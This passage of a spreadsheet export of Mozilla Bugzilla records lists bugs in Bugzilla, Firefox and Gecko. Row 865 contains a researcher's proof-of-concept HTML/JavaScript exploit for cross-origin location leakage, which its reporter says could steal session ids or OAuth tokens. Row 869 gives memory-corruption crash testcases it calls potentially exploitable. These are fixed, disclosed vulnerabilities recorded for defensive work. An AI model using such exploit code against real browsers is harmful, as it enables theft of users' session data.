      <c r="I861" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J861" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K861" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L861" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M861" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N861" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P861" t="inlineStr"/>
      <c r="Q861" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R861" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S861" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T861" t="n">
        <v>1</v>
      </c>
      <c r="U861" t="n">
        <v>0</v>
      </c>
      <c r="V861" t="n">
        <v>9</v>
      </c>
      <c r="W861" t="inlineStr">
        <is>
          <t>Using a nightly build, and probably on nightlies for a while back, there is no
context menu on the query page.
This is because query.cgi defines a getSelection() JS method.  However,
getSelection() is a method of the DOM0 window object (global scope).  Defining
this function over-writes the native method and uses the bugzilla method
instead.  Because context menu relies on window.getSelection() for its Search
engine context menu, the context menu breaks.
The bug is two-fold.  Bugzilla should not use getSelection or any other names
such as this, and Mozilla should either prevent getSelection from being modified
by code like this, or not break when this happens.  This bug covers renaming the
getSelection() method in Bugzilla.  I will file a separate bug for the Mozilla
issue.</t>
        </is>
      </c>
      <c r="X861" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="862">
      <c r="A862" t="n">
        <v>136754</v>
      </c>
      <c r="B862" t="inlineStr">
        <is>
          <t>2002-04-10 16:42:29 -0700</t>
        </is>
      </c>
      <c r="C862" t="inlineStr">
        <is>
          <t>warning in editproduct.cgi if usebuggroups option is on</t>
        </is>
      </c>
      <c r="D862" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E862" t="n">
        <v>1</v>
      </c>
      <c r="F862" t="n">
        <v>1</v>
      </c>
      <c r="G862" t="n">
        <v>4</v>
      </c>
      <c r="H862" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I862" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J862" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K862" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L862" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M862" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N862" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P862" t="inlineStr"/>
      <c r="Q862" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R862" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S862" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T862" t="n">
        <v>1</v>
      </c>
      <c r="U862" t="n">
        <v>0</v>
      </c>
      <c r="V862" t="n">
        <v>12</v>
      </c>
      <c r="W862" t="inlineStr">
        <is>
          <t>if the usebuggroups option is turned on I receive the folowing warning in 
editproducts.cgi when I select a product to edit
 Use of uninitialized value in substitution (s///) at CGI.pl line 372 (#1) (W 
uninitialized) An undefined value was used as if it were already defined. It 
was interpreted as a "" or a 0, but maybe it was a mistake. To suppress this 
warning assign a defined value to your variables. To help you figure out what 
was undefined, perl tells you what operation you used the undefined value in. 
Note, however, that perl optimizes your program and the operation displayed in 
the warning may not necessarily appear literally in your program. For 
example, "that $foo" is usually optimized into "that " . $foo, and the warning 
will refer to the concatenation (.) operator, even though there is no . in your 
program. [Thu Apr 11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 372. Use of 
uninitialized value in substitution (s///) at CGI.pl line 373 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 373. Use of 
uninitialized value in substitution (s///) at CGI.pl line 374 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 374. Use of 
uninitialized value in substitution (s///) at CGI.pl line 375 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 375. Use of 
uninitialized value in substitution (s///) at CGI.pl line 379 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 379. Use of 
uninitialized value in substitution (s///) at CGI.pl line 380 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 380. Use of 
uninitialized value in substitution (s///) at CGI.pl line 381 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 381. Use of 
uninitialized value in substitution (s///) at CGI.pl line 382 (#1) [Thu Apr 11 
01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 382. 
Use of uninitialized value in concatenation (.) or string at 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi 
line 119 (#1) [Thu Apr 11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in concatenation (.) or string at 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi 
line 119. 
   [Thu Apr 11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 372. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 373. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 374. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 375. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 379. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 380. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 381. [Thu Apr 
11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in substitution (s///) at CGI.pl line 382. Use of 
uninitialized value in concatenation (.) or string at 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi 
line 789 (#1) [Thu Apr 11 01:38:26 2002] 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi: 
Use of uninitialized value in concatenation (.) or string at 
C:\DL\Devlopment\BugZilla\current\mozilla\webtools\bugzilla\editproducts.cgi 
line 789.</t>
        </is>
      </c>
      <c r="X862" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="863">
      <c r="A863" t="n">
        <v>1445193</v>
      </c>
      <c r="B863" t="inlineStr">
        <is>
          <t>2018-03-13 03:27:32 -0700</t>
        </is>
      </c>
      <c r="C863" t="inlineStr">
        <is>
          <t>Enable desktop notifications when mach commands finish on Tier3 platforms</t>
        </is>
      </c>
      <c r="D863" t="inlineStr">
        <is>
          <t>2019-04-21 18:26:30 -0700</t>
        </is>
      </c>
      <c r="E863" t="n">
        <v>1</v>
      </c>
      <c r="F863" t="n">
        <v>1</v>
      </c>
      <c r="G863" t="n">
        <v>7</v>
      </c>
      <c r="H863" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I863" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J863" t="inlineStr">
        <is>
          <t>General: Unsupported Platforms</t>
        </is>
      </c>
      <c r="K863" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L863" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M863" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N863" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P863" t="inlineStr"/>
      <c r="Q863" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R863" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S863" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T863" t="n">
        <v>1</v>
      </c>
      <c r="U863" t="n">
        <v>0</v>
      </c>
      <c r="V863" t="n">
        <v>6</v>
      </c>
      <c r="W863" t="inlineStr">
        <is>
          <t>As notifications no longer depend on DBus they can be integrated on small desktops.
https://searchfox.org/mozilla-central/search?q=path%3Apython%2Fmozbuild%2Fmozbuild%2F*+notify%28</t>
        </is>
      </c>
      <c r="X863" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="864">
      <c r="A864" t="n">
        <v>1018234</v>
      </c>
      <c r="B864" t="inlineStr">
        <is>
          <t>2014-05-30 07:41:32 -0700</t>
        </is>
      </c>
      <c r="C864" t="inlineStr">
        <is>
          <t>Crash in ~FontTableRec() when called by :~gfxMathTable()</t>
        </is>
      </c>
      <c r="D864" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:56 -0700</t>
        </is>
      </c>
      <c r="E864" t="n">
        <v>1</v>
      </c>
      <c r="F864" t="n">
        <v>1</v>
      </c>
      <c r="G864" t="n">
        <v>3</v>
      </c>
      <c r="H864" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I864" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J864" t="inlineStr">
        <is>
          <t>MathML</t>
        </is>
      </c>
      <c r="K864" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L864" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M864" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N864" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P864" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main31+][adv-esr24.7+]</t>
        </is>
      </c>
      <c r="Q864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R864" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S864" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T864" t="n">
        <v>1</v>
      </c>
      <c r="U864" t="n">
        <v>0</v>
      </c>
      <c r="V864" t="n">
        <v>41</v>
      </c>
      <c r="W864" t="inlineStr">
        <is>
          <t>Created attachment 8431592
testcase.diff
Apply the attached patch and run the MathML reftests.  The crash occurs sometime after the added reftest, when the test specific fonts expire.
The crash is similar to that recorded in bug 961365, but it appears different stuff happens during the call to ReleaseFontTable()</t>
        </is>
      </c>
      <c r="X864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="865">
      <c r="A865" t="n">
        <v>802557</v>
      </c>
      <c r="B865" t="inlineStr">
        <is>
          <t>2012-10-17 05:20:48 -0700</t>
        </is>
      </c>
      <c r="C865" t="inlineStr">
        <is>
          <t>More cross origin location access problems</t>
        </is>
      </c>
      <c r="D865" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:05 -0700</t>
        </is>
      </c>
      <c r="E865" t="n">
        <v>1</v>
      </c>
      <c r="F865" t="n">
        <v>1</v>
      </c>
      <c r="G865" t="n">
        <v>3</v>
      </c>
      <c r="H865" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I865" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J865" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K865" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N865" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P865" t="inlineStr"/>
      <c r="Q865" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R865" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S865" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T865" t="n">
        <v>1</v>
      </c>
      <c r="U865" t="n">
        <v>0</v>
      </c>
      <c r="V865" t="n">
        <v>58</v>
      </c>
      <c r="W865" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Steps to reproduce:
Firefox 16.0.0 suffered from a nasty bug allowing cross-origin access to window.location, which can be easily exploited to steal session ids or OAuth tokens on many websites, including high profile ones.
Even though 16.0.1 fiexed the immediate bug, this called into question the effectiveness of the wrappers intended to protect the location object. Our research team PROSECCO at INRIA Paris is currently building formal analysis tools for JavaScript and while investigating the wrapped native prototype and global scope polluter implementation, we found that they suffered from a bottom-up property injection by prototype that can be exploited to recover cross-origin locations.
The following minimal exploit should be self-explanatory:
&lt;html&gt;
&lt;head&gt;
&lt;script type="text/javascript"&gt;
window.onload = function()
{
 f = document.getElementById('f');
 loc = f.contentWindow.location;
 loc2 = {toString: loc.toString};
 loc2.__proto__ = f.contentWindow.location;
 f.src = "http://www.mozilla.com";
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;iframe id="f" src="about:blank"&gt;&lt;/iframe&gt;
&lt;input type="button" onclick="alert(loc2.toString());" value="Get URL" /&gt;
&lt;/body&gt;
&lt;/html&gt;
Actual results:
Clicking the Get URL button reveals the current and complete location of the frame
Expected results:
As soon as the frame's location was changed to mozilla.com access to the location should have been impossible</t>
        </is>
      </c>
      <c r="X865" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="866">
      <c r="A866" t="n">
        <v>480001</v>
      </c>
      <c r="B866" t="inlineStr">
        <is>
          <t>2009-02-24 10:54:36 -0800</t>
        </is>
      </c>
      <c r="C866" t="inlineStr">
        <is>
          <t>[MYSQL] max_allowed_packet is no longer allowed to be modified in session scope, and throws an error if you try in 5.1.31 and newer</t>
        </is>
      </c>
      <c r="D866" t="inlineStr">
        <is>
          <t>2010-04-23 04:37:29 -0700</t>
        </is>
      </c>
      <c r="E866" t="n">
        <v>1</v>
      </c>
      <c r="F866" t="n">
        <v>1</v>
      </c>
      <c r="G866" t="n">
        <v>4</v>
      </c>
      <c r="H866" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I866" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J866" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K866" t="inlineStr">
        <is>
          <t>3.2.1</t>
        </is>
      </c>
      <c r="L866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P866" t="inlineStr"/>
      <c r="Q866" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R866" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S866" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T866" t="n">
        <v>1</v>
      </c>
      <c r="U866" t="n">
        <v>2</v>
      </c>
      <c r="V866" t="n">
        <v>16</v>
      </c>
      <c r="W866" t="inlineStr">
        <is>
          <t>See the attached bug report.  The SQL "SET SESSION max_allowed_packet = xxxx" causes MySQL 5.1.31 and newer to throw an error.  Apparently it never worked, and rather than mislead people into thinking it did, they decided to make it throw an error so you'd know it didn't work.</t>
        </is>
      </c>
      <c r="X866" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="867">
      <c r="A867" t="n">
        <v>317934</v>
      </c>
      <c r="B867" t="inlineStr">
        <is>
          <t>2005-11-27 09:25:02 -0800</t>
        </is>
      </c>
      <c r="C867" t="inlineStr">
        <is>
          <t>CVE-2006-0294 [FIX]Crash with evil testcase, switching from position:relative to static</t>
        </is>
      </c>
      <c r="D867" t="inlineStr">
        <is>
          <t>2009-04-24 11:24:45 -0700</t>
        </is>
      </c>
      <c r="E867" t="n">
        <v>1</v>
      </c>
      <c r="F867" t="n">
        <v>1</v>
      </c>
      <c r="G867" t="n">
        <v>3</v>
      </c>
      <c r="H867" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I867" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J867" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K867" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L867" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M867" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N867" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P867" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q867" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R867" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S867" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T867" t="n">
        <v>1</v>
      </c>
      <c r="U867" t="n">
        <v>0</v>
      </c>
      <c r="V867" t="n">
        <v>19</v>
      </c>
      <c r="W867" t="inlineStr">
        <is>
          <t>See upcoming testcase, when clicking on the button, current Mozilla builds crash.
This doesn't happen in Mozilla1.7.
Talkback ID: TB12309372W
0x00000000
nsIView::Destroy  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/view/src/nsView.cpp, line 307]
nsSplittableFrame::Destroy  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/generic/nsSplittableFrame.cpp, line 71]
nsPositionedInlineFrame::Destroy  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/generic/nsInlineFrame.cpp, line 1052]
nsFrameList::DestroyFrames  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/generic/nsFrameList.cpp, line 138]
nsPositionedInlineFrame::Destroy  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/generic/nsInlineFrame.cpp, line 1052]
nsBlockFrame::RemoveFrame  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/generic/nsBlockFrame.cpp, line 5516]
nsFrameManager::RemoveFrame  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsFrameManager.cpp, line 704]
nsCSSFrameConstructor::ContentRemoved  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 9946]
nsCSSFrameConstructor::RecreateFramesForContent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 11495]
nsCSSFrameConstructor::RestyleElement  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 10377]
nsCSSFrameConstructor::ProcessOneRestyle  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 13211]
nsCSSFrameConstructor::ProcessPendingRestyles  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 13259]
nsCSSFrameConstructor::RestyleEvent::HandleEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsCSSFrameConstructor.cpp, line 13324]
SHELL32.dll + 0x520c24 (0x778b0c24)</t>
        </is>
      </c>
      <c r="X867" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="868">
      <c r="A868" t="n">
        <v>1828716</v>
      </c>
      <c r="B868" t="inlineStr">
        <is>
          <t>2023-04-18 09:56:10 -0700</t>
        </is>
      </c>
      <c r="C868" t="inlineStr">
        <is>
          <t>“ms-cxh” and “ms-cxh-full” protocol handlers considered harmful</t>
        </is>
      </c>
      <c r="D868" t="inlineStr">
        <is>
          <t>2023-10-17 20:49:26 -0700</t>
        </is>
      </c>
      <c r="E868" t="n">
        <v>1</v>
      </c>
      <c r="F868" t="n">
        <v>1</v>
      </c>
      <c r="G868" t="n">
        <v>2</v>
      </c>
      <c r="H868" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I868" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J868" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K868" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L868" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M868" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N868" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P868" t="inlineStr">
        <is>
          <t>[adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q868" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R868" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S868" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T868" t="n">
        <v>1</v>
      </c>
      <c r="U868" t="n">
        <v>0</v>
      </c>
      <c r="V868" t="n">
        <v>11</v>
      </c>
      <c r="W868" t="inlineStr">
        <is>
          <t>These protocol handlers exist on Win10 and they can do things like soft-locking the machine. They probably shouldn't be accessible through the browser by default.</t>
        </is>
      </c>
      <c r="X868" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="869">
      <c r="A869" t="n">
        <v>718202</v>
      </c>
      <c r="B869" t="inlineStr">
        <is>
          <t>2012-01-14 09:50:32 -0800</t>
        </is>
      </c>
      <c r="C869" t="inlineStr">
        <is>
          <t>Crash @GetCollectionForType with __proto__</t>
        </is>
      </c>
      <c r="D869" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E869" t="n">
        <v>1</v>
      </c>
      <c r="F869" t="n">
        <v>1</v>
      </c>
      <c r="G869" t="n">
        <v>3</v>
      </c>
      <c r="H869" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I869" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J869" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K869" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N869" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P869" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q869" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R869" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S869" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T869" t="n">
        <v>1</v>
      </c>
      <c r="U869" t="n">
        <v>0</v>
      </c>
      <c r="V869" t="n">
        <v>19</v>
      </c>
      <c r="W869" t="inlineStr">
        <is>
          <t>Description:
This crash seems to be related to the use of __proto__, the Worker object and event calls on the object. It's marked as a security issue, as it crashes on accessing non-mapped memory addresses which vary and could potentially be controlled by an attacker.
Tested and Affected Versions:
	Firefox 9.0.1 (Windows)
        Firefox trunk 12.0a (Linux)
        Ubuntu Firefox 9.0.1
Testcase:
The following testcase trigger the bug and shows exploitable behaviour on Linux. Null deref on windows.
o2=new ArrayBuffer(1337);
o4=new Worker(null);
o2.__proto__ = o4.__proto__;
o2.addEventListener(0,0);
This testcase shows potentially exploitable behaviour on both Windows and Linux:
o2=document.body;
o4=new Worker(null);
o2.__proto__ = o4.__proto__;
o2.removeEventListener(0,0);
Stack Backtrace:
Following stack backtraces have been observed during testing.
Linux:
(gdb) bt 10
#0  GetCollectionForType (aTypeId=140736937735104, aHead=0x7fffc31563e8)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/dom/workers/ListenerManager.cpp:132
#1  mozilla::dom::workers::events::ListenerManager::Add (this=0x7fffc31563e8, aCx=0x7fffc72d0800, aType=0x7fffdf2e33c0, 
    aListenerVal=..., aPhase=mozilla::dom::workers::events::ListenerManager::Bubbling, aWantsUntrusted=false)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/dom/workers/ListenerManager.cpp:204
#2  0x00007ffff40b295a in AddEventListener (aWantsUntrusted=&lt;optimized out&gt;, aCapturing=&lt;optimized out&gt;, 
    aListener=&lt;optimized out&gt;, aType=&lt;optimized out&gt;, aCx=0x7fffc72d0800, this=0x7fffc31563e8)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/dom/workers/ListenerManager.h:98
#3  mozilla::dom::workers::events::EventTarget::AddEventListener (aCx=0x7fffc72d0800, aArgc=3, aVp=0x7fffdf9fe148)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/dom/workers/EventTarget.cpp:162
#4  0x00007ffff485d12e in CallJSNative (args=..., native=&lt;optimized out&gt;, cx=0x7fffc72d0800)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jscntxtinlines.h:296
#5  js::InvokeKernel (cx=0x7fffc72d0800, argsRef=&lt;optimized out&gt;, construct=js::NO_CONSTRUCT)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jsinterp.cpp:660
#6  0x00007ffff4853e02 in js::Interpret (cx=0x7fffc72d0800, entryFrame=0x7fffdf9fe0d0, interpMode=js::JSINTERP_NORMAL)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jsinterp.cpp:4036
#7  0x00007ffff485cedf in js::ExecuteKernel (cx=0x7fffc72d0800, script=0x7fffdf774ac0, scopeChain=&lt;optimized out&gt;, 
    thisv=&lt;optimized out&gt;, type=&lt;optimized out&gt;, evalInFrame=&lt;optimized out&gt;, result=0x7fffdf9fe0a8)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jsinterp.cpp:814
#8  0x00007ffff486f30d in EvalKernel (cx=0x7fffc72d0800, call=..., evalType=DIRECT_EVAL, caller=0x7fffdf9fe030, 
    scopeobj=...) at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jsobj.cpp:1283
#9  0x00007ffff4854993 in js::Interpret (cx=0x7fffc72d0800, entryFrame=0x7fffdf9fe030, interpMode=js::JSINTERP_NORMAL)
    at /build/buildd/firefox-9.0.1+build1/build-tree/mozilla/js/src/jsinterp.cpp:4005
(More stack frames follow...)
}}}
Windows:
